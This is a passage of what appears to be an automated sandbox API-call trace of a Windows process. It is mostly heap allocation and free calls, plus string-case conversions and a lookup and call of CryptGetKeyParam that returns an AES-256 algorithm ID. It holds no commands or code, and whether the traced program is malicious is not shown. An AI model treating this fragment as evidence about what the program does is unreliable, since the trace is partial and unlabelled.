(HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0105.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0105.607] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0105.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0105.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a10 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac10 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0105.608] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.609] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0105.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0105.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.610] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0670 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0105.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0105.610] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0105.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0105.610] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0105.611] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0105.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0105.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0105.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0670 | out: hHeap=0x1780000) returned 1 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0105.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0105.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0105.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0105.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.612] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0105.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0105.613] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0105.614] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0260 | out: hHeap=0x1780000) returned 1 [0105.614] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2bf0, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2bf0*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0105.614] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03a0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0105.615] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0105.616] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | 